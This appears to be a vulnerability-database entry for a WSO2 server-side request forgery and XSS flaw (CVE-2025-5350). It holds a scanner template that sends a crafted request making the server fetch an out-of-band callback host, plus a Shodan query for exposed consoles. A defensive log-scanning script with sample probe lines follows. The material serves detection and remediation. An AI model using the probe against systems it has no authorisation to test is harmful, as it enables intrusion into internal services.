WSO2 - Server Side Request Forgery
CVE-2025-5350
Verified
Description
WSO2 products contain SSRF and reflected XSS vulnerabilities in the deprecated Try-It feature, which is reachable only by administrative users. Both flaws stem from improper URL validation and direct reflection of fetched content, and let attackers trick administrators into executing arbitrary JavaScript and querying internal services.
Severity
Medium
CVSS Score
5.9
Exploit Probability
1%
Affected Product
api_manager
Published Date
February 14, 2026
Template Author
Sourabh Grover
CVE-2025-5350.yaml

id: CVE-2025-5350

info:
  name: WSO2 - Server Side Request Forgery
  author: Sourabh Grover
  severity: medium
  description: |
    WSO2 products contain SSRF and reflected XSS vulnerabilities in the deprecated Try-It feature, which is reachable only by administrative users. Both flaws stem from improper URL validation and direct reflection of fetched content, and let attackers trick administrators into executing arbitrary JavaScript and querying internal services.
  impact: |
    Attackers can execute arbitrary JavaScript in admin browsers and perform internal network requests, risking UI manipulation, data exfiltration, and internal service enumeration.
  remediation: |
    Remove or secure the deprecated Try-It feature and validate user-supplied URLs properly; update to the latest product versions with fixes.
  reference:
    - https://crnkovic.dev/wso2-server-side-request-forgery/
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.9
    cve-id: CVE-2025-5350
    epss-score: 0.00654
    epss-percentile: 0.71167
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: wso2
    product: api_manager
    shodan-query: http.title:"WSO2 Management Console"
  tags: cve,cve2025,ssrf,wso2,carbon,oast,oob

variables:
  cb_url: "http://{{interactsh-url}}/"
  uri_b64: "{{base64(cb_url)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/carbon/admin/jsp/WSRequestXSSproxy_ajaxprocessor.jsp;b=.jar?uri={{uri_b64}}&pattern=%7E&username=%7E&password=%7E&payload=%7E"

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns") || contains(interactsh_protocol, "http")'
          - 'contains(body, "AxisFault")'
        condition: and
# digest: 490a0046304402207e41c42397ffa91e25ae12585051c672937df98d3dc6d1821d8c404d22d0778b0220157b53e0f9583930b3318bc0b4313b3b3f512eaf528d7785e9ad8d4067749b03:922c64590222798bb761d5b6d8e72950
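A defender-side check for the probe the template above sends, added here as an example and not part of the template or of any WSO2 code: it scans web-server access-log lines for requests to the Try-It proxy path, decodes the base64 `uri` parameter, and labels where the proxied fetch would have gone. The log lines, source addresses and hostnames are constructed for the example.

```python
import base64, ipaddress, re
from urllib.parse import parse_qs, quote, urlsplit

# Path of the deprecated Try-It proxy that the template above requests.
TRYIT_PROXY = "/carbon/admin/jsp/WSRequestXSSproxy_ajaxprocessor.jsp"

def _b64q(url: str) -> str:
    # base64, then percent-encode, as a well-behaved client would send the 'uri' value
    return quote(base64.b64encode(url.encode()).decode(), safe="")

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [14/Feb/2026:10:01:02 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 200 1234',
    '10.0.0.7 - - [14/Feb/2026:10:01:09 +0000] "GET ' + TRYIT_PROXY + ';b=.jar?uri=' + _b64q("http://oast.example.test/") + '&pattern=%7E&username=%7E&password=%7E&payload=%7E HTTP/1.1" 500 2048',
    '10.0.0.9 - - [14/Feb/2026:10:02:11 +0000] "GET ' + TRYIT_PROXY + '?uri=' + _b64q("http://127.0.0.1:9443/services/") + '&pattern=%7E HTTP/1.1" 500 900',
    '10.0.0.9 - - [14/Feb/2026:10:02:30 +0000] "GET ' + TRYIT_PROXY + '?uri=not-base64!! HTTP/1.1" 500 300',
])

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_tryit_uri(target: str):
    """Decoded 'uri' value if the request hits the Try-It proxy, else None (undecodable hits still count)."""
    path, _, query = target.partition("?")
    if path.split(";", 1)[0] != TRYIT_PROXY:   # drop ';b=.jar'-style path parameters first
        return None
    raw = parse_qs(query).get("uri", [""])[0]
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except ValueError:                           # binascii.Error is a ValueError subclass
        return "<undecodable uri parameter>"

def classify_dest(url: str) -> str:
    """Where the proxied fetch would go: loopback, internal, external or unknown."""
    host = urlsplit(url).hostname if "://" in url else None
    if not host:
        return "unknown"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"                        # a hostname; DNS resolution is out of scope
    return "loopback" if ip.is_loopback else "internal" if ip.is_private else "external"

def scan_log(text: str) -> list:
    """One finding per logged request that reached the Try-It proxy."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        decoded = decode_tryit_uri(m["target"]) if m else None
        if decoded is not None:
            findings.append({"src": m["src"], "ts": m["ts"], "status": m["status"], "uri": decoded, "dest": classify_dest(decoded)})
    return findings
```

Any hit on this path is worth an alert on a patched or deprecated-feature-disabled host; the `dest` label separates out-of-band callback tests from loopback or internal-range targets.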
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L
CVE ID:
cve-2025-5350
CWE ID:
cwe-79
Remediation Steps
Remove or secure the deprecated Try-It feature and validate user-supplied URLs properly; update to the latest product versions with fixes.